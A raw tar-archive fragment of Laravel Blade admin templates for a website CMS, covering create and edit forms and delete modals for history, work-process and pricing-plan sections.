}}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> <div class="modal fade" id="historyModal" tabindex="-1" role="dialog" aria-labelledby="historyModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="historyModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('history.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group" > <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 450 x 300 (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="history_date">{{ __('content.history_date') }} </label> <input type="text" name="history_date" class="form-control" id="history_date"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title_2">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title_2"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title_2')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title_2')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title_2')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title_2')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title_2')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title_2')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <textarea name="description" class="form-control" id="description" rows="3"></textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0" required> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/history/edit.blade.php���������������������������������������������������������0000644�����������������00000024225�14765366573�0015060 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_history') }} <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/history-'.$item->style.'.jpg') }}" alt="draft image"> </div> </h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('history.update', $item->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $item->style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 450 x 300) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($item->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/history/'.$item->section_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($item->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="history_date">{{ __('content.history_date') }} </label> <input type="text" name="history_date" class="form-control" id="history_date" value="{{ $item->history_date }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title" value="{{ $item->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <textarea name="description" class="form-control" id="description" rows="3">{{ $item->description }}</textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $item->order }}" required> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="deleteImageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteImageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('work-process.destroy_image', $item->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> </div> </div> </div> <!-- end row --> @endsection ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/work_process/create.blade.php��������������������������������������������������0000644�����������������00000060151�14765366573�0016413 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.work_process') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('work-process.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> </h6> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#workProcessSectionModal">{{ __('content.section_title_and_description') }}</button> <button type="button" class="btn btn-primary mb-3" data-toggle="modal" data-target="#workProcessModal">+ {{ __('content.add_work_process') }}</button> </div> </div> @if (count($items) > 0) <div class="mr-3"> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('work-process.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.title') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($items); $asc=0; @endphp @foreach ($items as $item) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $item->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>@php echo html_entity_decode($item->title); @endphp</td> <td>{{ $item->order }}</td> <td> <div> <a href="{{ route('work-process.edit', $item->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="featureModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="featureModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('work-process.destroy', $item->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="workProcessSectionModal" tabindex="-1" role="dialog" aria-labelledby="workProcessSectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="workProcessSectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($item_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('work-process-section.update', $item_section->id) }}" method="POST"> @method('PUT') @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title" value="{{ $item_section->section_title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $item_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#workProcessSectionDestroyModal{{ $item_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </form> <!-- Modal --> <div class="modal fade" id="workProcessSectionDestroyModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="workProcessSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="workProcessSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('work-process-section.destroy', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('work-process-section.store') }}" method="POST"> @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> <div class="modal fade" id="workProcessModal" tabindex="-1" role="dialog" aria-labelledby="workProcessModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="workProcessModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('work-process.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group" > <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 328 x 328 (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title_2">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title_2"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title_2')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title_2')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title_2')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title_2')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title_2')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title_2')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0" required> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/work_process/edit.blade.php����������������������������������������������������0000644�����������������00000017413�14765366573�0016100 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_work_process') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('work-process.update', $item->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $item->style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 64 x 64) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($item->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/work_process/'.$item->section_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($item->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title" value="{{ $item->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $item->order }}" required> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="deleteImageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteImageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('work-process.destroy_image', $item->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> </div> </div> </div> <!-- end row --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/plan/create.blade.php����������������������������������������������������������0000644�����������������00000060654�14765366573�0014635 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.plan') }}</h6> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#planSectionModal">{{ __('content.section_title_and_description') }}</button> <button type="button" class="btn btn-primary mb-3" data-toggle="modal" data-target="#planModal">+ {{ __('content.add_plan') }}</button> </div> </div> @if (count($items) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('plan.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.name') }}</th> <th>{{ __('content.price') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($items); $asc=0; @endphp @foreach ($items as $item) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $item->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $item->name }}</td> <td>{{ $item->price }}</td> <td>{{ $item->order }}</td> <td> <div> <a href="{{ route('plan.edit', $item->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="testimonialModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="testimonialModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('plan.destroy', $item->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="planSectionModal" tabindex="-1" role="dialog" aria-labelledby="buyNowSectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="buyNowSectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($item_section)) @if ($demo_mode == 